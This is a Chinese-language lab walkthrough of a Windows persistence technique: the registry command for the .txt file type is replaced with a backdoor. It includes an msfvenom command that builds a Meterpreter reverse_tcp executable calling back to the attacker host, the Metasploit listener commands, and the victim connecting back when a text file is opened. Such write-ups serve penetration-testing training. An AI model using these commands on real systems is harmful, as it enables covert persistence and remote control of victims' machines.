环境说明
| IP | HOSTNAME | NOTE |
|---|---|---|
| 172.16.106.67 | kali_dqy | 攻击者主机 |
| 10.10.10.88 | win10_dqy | 受害者主机 |
前言
- 默认文件关联是后渗透权限维持技术中的一种,其将一种类型的文件与一个可以打开它的程序建立依赖关系,一个文件可以与多个应用程序关联。
- 举个例子,比如我们要打开.txt后缀的文件,那么Windows上默认打开.txt后缀文件的程序是记事本(即Notepad.exe),那么我们通过将Notepad.exe替换成我们的后门程序,那么当打开.txt后缀文件的时候,就会执行我们的后门程序,进而实现权限维持。

复现过程
查看文件类型关联的程序
- 可以通过assoc命令查看不同后缀文件所关联的文件类型,比如查看.txt后缀文件所关联的文件类型。
assoc .txt

- 从上图得知.txt后缀文件关联的文件类型为txtfile,我们可以通过ftype命令查看打开该文件类型的应用程序
ftype txtfile

修改文件类型关联的程序
- 我们可以在注册表中找到打开txtfile的程序,注册表编辑器输入以下路径即可:
HKCR\txtfile\shell\open\command

-
其中txtfile是可以替换的,根据assoc命令结果的文件类型来进行替换,可以查看不同的应用程序。
-
修改前记得先将注册表值进行备份,然后再修改为我们后门程序的路径。

MSF监听上线
- MSF后门程序生成命令如下:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f exe > attack_demo.exe
- 开启监听2335端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit
- 如下图:

- 此时我们打开受害者主机上的.txt后缀文件,如下图,目标主机上线
